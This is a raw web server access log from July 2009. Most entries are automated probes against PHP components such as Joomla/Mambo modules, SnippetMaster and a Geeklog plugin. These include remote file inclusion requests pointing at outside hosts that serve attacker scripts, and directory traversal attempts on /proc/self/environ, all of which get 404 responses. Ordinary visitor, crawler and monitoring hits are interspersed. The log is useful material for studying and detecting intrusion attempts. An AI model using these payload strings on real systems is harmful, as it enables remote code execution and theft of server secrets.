222.236.44.96 - - [15/Jul/2009:00:25:03 -0400] "GET /logs/access_log.Q109062500//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 271 "-" "XXXXXX"
222.236.44.96 - - [15/Jul/2009:00:25:04 -0400] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 244 "-" "XXXXXX"
222.236.44.96 - - [15/Jul/2009:00:25:04 -0400] "GET /logs/access_log.Q109062500//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 271 "-" "XXXXXX"
222.236.44.96 - - [15/Jul/2009:00:25:04 -0400] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 244 "-" "XXXXXX"
222.236.44.96 - - [15/Jul/2009:00:25:05 -0400] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 249 "-" "XXXXXX"
222.236.44.96 - - [15/Jul/2009:00:25:06 -0400] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 249 "-" "XXXXXX"
99.141.48.225 - - [15/Jul/2009:00:25:40 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118B064A2A84D000B791076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; IEMB3)"
99.141.48.225 - - [15/Jul/2009:00:25:40 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118B064A2A84D000B791076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; IEMB3)"
72.30.161.230 - - [15/Jul/2009:00:25:08 -0400] "GET /logs/access_log.Q109071300 HTTP/1.0" 200 4718643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
114.200.199.144 - - [15/Jul/2009:00:26:27 -0400] "GET /logs/access_log.Q109061800////?_SERVER[DOCUMENT_ROOT]=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
174.37.32.229 - - [15/Jul/2009:00:26:45 -0400] "GET /logs/ HTTP/1.1" 200 9592 "-" "BlackBerry8830/4.2.2 Profile/MIDP-2.0 Configuration/CLOC-1.1 VendorID/105"
222.236.44.96 - - [15/Jul/2009:00:27:54 -0400] "GET /logs/access_log.Q109060800//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 271 "-" "XXXXXX"
222.236.44.96 - - [15/Jul/2009:00:27:54 -0400] "GET /logs/access_log.Q109060800//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 271 "-" "XXXXXX"
209.59.12.99 - - [15/Jul/2009:00:28:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
207.58.155.223 - - [15/Jul/2009:00:28:59 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
207.58.155.223 - - [15/Jul/2009:00:28:59 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
207.58.155.223 - - [15/Jul/2009:00:28:59 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
63.247.72.114 - - [15/Jul/2009:00:29:04 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.824"
69.61.61.146 - - [15/Jul/2009:00:29:04 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.827"
63.247.72.114 - - [15/Jul/2009:00:29:04 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.824"
63.247.72.114 - - [15/Jul/2009:00:29:04 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.824"
69.61.61.146 - - [15/Jul/2009:00:29:04 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.827"
69.61.61.146 - - [15/Jul/2009:00:29:04 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.827"
207.210.89.18 - - [15/Jul/2009:00:29:29 -0400] "GET //plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 240 "-" "Advanced Browser (http://www.avantbrowser.com)"
207.210.89.18 - - [15/Jul/2009:00:29:29 -0400] "GET /logs//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 245 "-" "Advanced Browser (http://www.avantbrowser.com)"
207.210.89.18 - - [15/Jul/2009:00:29:29 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
207.210.89.18 - - [15/Jul/2009:00:29:29 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
207.210.89.18 - - [15/Jul/2009:00:29:29 -0400] "GET //plugins/spamx/BlackList.Examine.class.php?_CONF[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 240 "-" "XXXXXX"
207.210.89.18 - - [15/Jul/2009:00:29:29 -0400] "GET /logs//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 245 "-" "XXXXXX"
207.210.89.18 - - [15/Jul/2009:00:29:29 -0400] "GET //plugins/spamx/BlackList.Examine.class.php?_CONF[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 240 "-" "XXXXXX"
207.210.89.18 - - [15/Jul/2009:00:29:29 -0400] "GET /logs//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 245 "-" "XXXXXX"
72.30.161.230 - - [15/Jul/2009:00:29:01 -0400] "GET /logs/access_log.Q109071300 HTTP/1.0" 200 4718643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.58.155.223 - - [15/Jul/2009:00:29:45 -0400] "GET /logs/access_log.Q109052000//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
63.247.72.114 - - [15/Jul/2009:00:29:47 -0400] "GET /logs/access_log.Q109052000//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.824"
69.61.61.146 - - [15/Jul/2009:00:29:53 -0400] "GET /logs/access_log.Q109052000//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.827"
84.234.25.64 - - [15/Jul/2009:00:30:06 -0400] "GET /logs/access_log.Q109061900/main.php?appserv_root=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.811"
84.234.25.64 - - [15/Jul/2009:00:30:07 -0400] "GET /logs/main.php?appserv_root=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 211 "-" "libwww-perl/5.811"
84.234.25.64 - - [15/Jul/2009:00:30:07 -0400] "GET /main.php?appserv_root=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 206 "-" "libwww-perl/5.811"
78.108.82.42 - - [15/Jul/2009:00:30:16 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sunsex.org/wp-content/uploads/yes.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
78.108.82.42 - - [15/Jul/2009:00:30:16 -0400] "GET /logs/access_log.Q109051600/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sunsex.org/wp-content/uploads/yes.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
78.108.82.42 - - [15/Jul/2009:00:30:16 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sunsex.org/wp-content/uploads/yes.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
84.234.25.64 - - [15/Jul/2009:00:30:18 -0400] "GET /logs/access_log.Q109051400/main.php?appserv_root=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.811"
78.108.82.42 - - [15/Jul/2009:00:30:40 -0400] "GET /logs/access_log.Q109061900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sunsex.org/wp-content/uploads/yes.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
211.121.173.196 - - [15/Jul/2009:00:31:34 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.800"
211.121.173.196 - - [15/Jul/2009:00:31:35 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.800"
211.121.173.196 - - [15/Jul/2009:00:31:36 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.800"
66.249.68.247 - - [15/Jul/2009:00:31:47 -0400] "GET /images/home_connect_off.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
207.58.155.223 - - [15/Jul/2009:00:32:19 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.810"
207.58.155.223 - - [15/Jul/2009:00:32:19 -0400] "GET //modules/errors.php?error=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.810"
207.58.155.223 - - [15/Jul/2009:00:32:20 -0400] "GET /logs//modules/errors.php?error=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.810"
72.30.161.230 - - [15/Jul/2009:00:32:28 -0400] "GET /logs/error_log.Q109051100 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
63.247.72.114 - - [15/Jul/2009:00:32:47 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.824"
63.247.72.114 - - [15/Jul/2009:00:32:47 -0400] "GET //modules/errors.php?error=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.824"
63.247.72.114 - - [15/Jul/2009:00:32:47 -0400] "GET /logs//modules/errors.php?error=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.824"
211.121.173.196 - - [15/Jul/2009:00:32:52 -0400] "GET /logs/access_log.Q109052000//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.800"
69.61.61.146 - - [15/Jul/2009:00:32:53 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.827"
69.61.61.146 - - [15/Jul/2009:00:32:53 -0400] "GET //modules/errors.php?error=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.827"
69.61.61.146 - - [15/Jul/2009:00:32:53 -0400] "GET /logs//modules/errors.php?error=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.827"
209.59.12.99 - - [15/Jul/2009:00:33:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.70 - - [15/Jul/2009:00:33:56 -0400] "GET /images/items/index3_imp_air.jpg HTTP/1.1" 200 1763 "-" "Googlebot-Image/1.0"
189.73.92.17 - - [15/Jul/2009:00:33:56 -0400] "GET /logs/access_log.Q109062200//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 267 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
189.73.92.17 - - [15/Jul/2009:00:33:56 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
189.73.92.17 - - [15/Jul/2009:00:33:56 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
189.73.92.17 - - [15/Jul/2009:00:33:56 -0400] "GET /logs/access_log.Q109070600//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 267 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
189.73.92.17 - - [15/Jul/2009:00:33:56 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
189.73.92.17 - - [15/Jul/2009:00:33:56 -0400] "GET /logs/access_log.Q109062200/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
189.73.92.17 - - [15/Jul/2009:00:33:56 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
189.73.92.17 - - [15/Jul/2009:00:33:56 -0400] "GET /logs/access_log.Q109070600/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
189.73.92.17 - - [15/Jul/2009:00:33:57 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 245 "-" "XXXXXX"
189.73.92.17 - - [15/Jul/2009:00:33:57 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 240 "-" "XXXXXX"
189.73.92.17 - - [15/Jul/2009:00:33:57 -0400] "GET /logs/access_log.Q109062200//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 267 "-" "XXXXXX"
189.73.92.17 - - [15/Jul/2009:00:33:57 -0400] "GET /logs/access_log.Q109070600//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 267 "-" "XXXXXX"
189.73.92.17 - - [15/Jul/2009:00:33:57 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 245 "-" "XXXXXX"
189.73.92.17 - - [15/Jul/2009:00:33:57 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 240 "-" "XXXXXX"
189.73.92.17 - - [15/Jul/2009:00:33:57 -0400] "GET /logs/access_log.Q109062200//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 267 "-" "XXXXXX"
189.73.92.17 - - [15/Jul/2009:00:33:57 -0400] "GET /logs/access_log.Q109070600//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 267 "-" "XXXXXX"
85.18.1.11 - - [15/Jul/2009:00:34:09 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
85.18.1.11 - - [15/Jul/2009:00:34:09 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
85.18.1.11 - - [15/Jul/2009:00:34:11 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
203.105.83.126 - - [15/Jul/2009:00:35:11 -0400] "GET /logs/access_log.Q109052000//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
203.105.83.126 - - [15/Jul/2009:00:35:12 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
203.105.83.126 - - [15/Jul/2009:00:35:12 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
89.234.63.107 - - [15/Jul/2009:00:35:45 -0400] "GET /logs/access_log.Q109062800//admin/editeur/spaw_control.class.phpinclude_path=http://www.own-team.xz.lt/idxx.txt?? HTTP/1.1" 404 309 "-" "Mozilla/5.0"
89.234.63.107 - - [15/Jul/2009:00:35:45 -0400] "GET /logs/access_log.Q109050800//admin/editeur/spaw_control.class.phpinclude_path=http://www.own-team.xz.lt/idxx.txt?? HTTP/1.1" 404 309 "-" "Mozilla/5.0"
89.234.63.107 - - [15/Jul/2009:00:35:49 -0400] "GET /logs/access_log.Q109062800//admin/editeur/spaw_control.class.phpinclude_path=http://www.own-team.xz.lt/idxx.txt?? HTTP/1.1" 404 309 "-" "Mozilla/5.0"
89.234.63.107 - - [15/Jul/2009:00:35:49 -0400] "GET /logs/access_log.Q109050800//admin/editeur/spaw_control.class.phpinclude_path=http://www.own-team.xz.lt/idxx.txt?? HTTP/1.1" 404 309 "-" "Mozilla/5.0"
203.105.83.126 - - [15/Jul/2009:00:35:53 -0400] "GET /logs/error_log.Q109051900//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
85.18.1.11 - - [15/Jul/2009:00:36:04 -0400] "GET /logs/access_log.Q109052000//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
207.58.155.223 - - [15/Jul/2009:00:36:10 -0400] "GET /logs/access_log.Q109070800//modules/errors.php?error=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.810"
63.247.72.114 - - [15/Jul/2009:00:36:16 -0400] "GET /logs/access_log.Q109070800//modules/errors.php?error=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.824"
69.61.61.146 - - [15/Jul/2009:00:36:19 -0400] "GET /logs/access_log.Q109070800//modules/errors.php?error=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.827"
72.30.79.59 - - [15/Jul/2009:00:36:25 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.59 - - [15/Jul/2009:00:36:25 -0400] "GET /logs/error_log.Q109051100 HTTP/1.0" 200 4162834 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.59 - - [15/Jul/2009:00:36:31 -0400] "GET /logs/error_log.Q109051100 HTTP/1.0" 200 4162834 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.23.36.15 - - [15/Jul/2009:00:37:22 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
94.23.36.15 - - [15/Jul/2009:00:37:22 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
94.23.36.15 - - [15/Jul/2009:00:37:23 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
94.23.36.15 - - [15/Jul/2009:00:37:23 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
94.23.36.15 - - [15/Jul/2009:00:37:23 -0400] "GET /modules/My_eGallery/index.php?basepath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 227 "-" "XXXXXX"
94.23.36.15 - - [15/Jul/2009:00:37:23 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 232 "-" "XXXXXX"
94.23.36.15 - - [15/Jul/2009:00:37:23 -0400] "GET /modules/My_eGallery/index.php?basepath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 227 "-" "XXXXXX"
94.23.36.15 - - [15/Jul/2009:00:37:23 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 232 "-" "XXXXXX"
209.59.12.99 - - [15/Jul/2009:00:38:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.247 - - [15/Jul/2009:00:40:55 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
68.4.59.250 - - [15/Jul/2009:00:41:26 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB6; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
68.4.59.250 - - [15/Jul/2009:00:41:26 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB6; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
68.4.59.250 - - [15/Jul/2009:00:41:28 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB6; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
68.4.59.250 - - [15/Jul/2009:00:41:28 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB6; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
72.30.161.230 - - [15/Jul/2009:00:41:21 -0400] "GET /logs/access_log.Q109070700 HTTP/1.0" 200 4914184 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.230 - - [15/Jul/2009:00:42:22 -0400] "GET /logs/error_log.Q109071300 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.229.45.106 - - [15/Jul/2009:00:42:25 -0400] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://digitalflutterby.com/read/idv6.txt?%0D?? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
87.229.45.106 - - [15/Jul/2009:00:42:25 -0400] "GET /logs/error_log.Q109061000/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://digitalflutterby.com/read/idv6.txt?%0D?? HTTP/1.1" 404 289 "-" "libwww-perl/5.805"
87.229.45.106 - - [15/Jul/2009:00:42:26 -0400] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://digitalflutterby.com/read/idv6.txt?%0D?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
87.229.45.106 - - [15/Jul/2009:00:42:39 -0400] "GET /logs/access_log.Q109061800/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://digitalflutterby.com/read/idv6.txt?%0D?? HTTP/1.1" 404 290 "-" "libwww-perl/5.805"
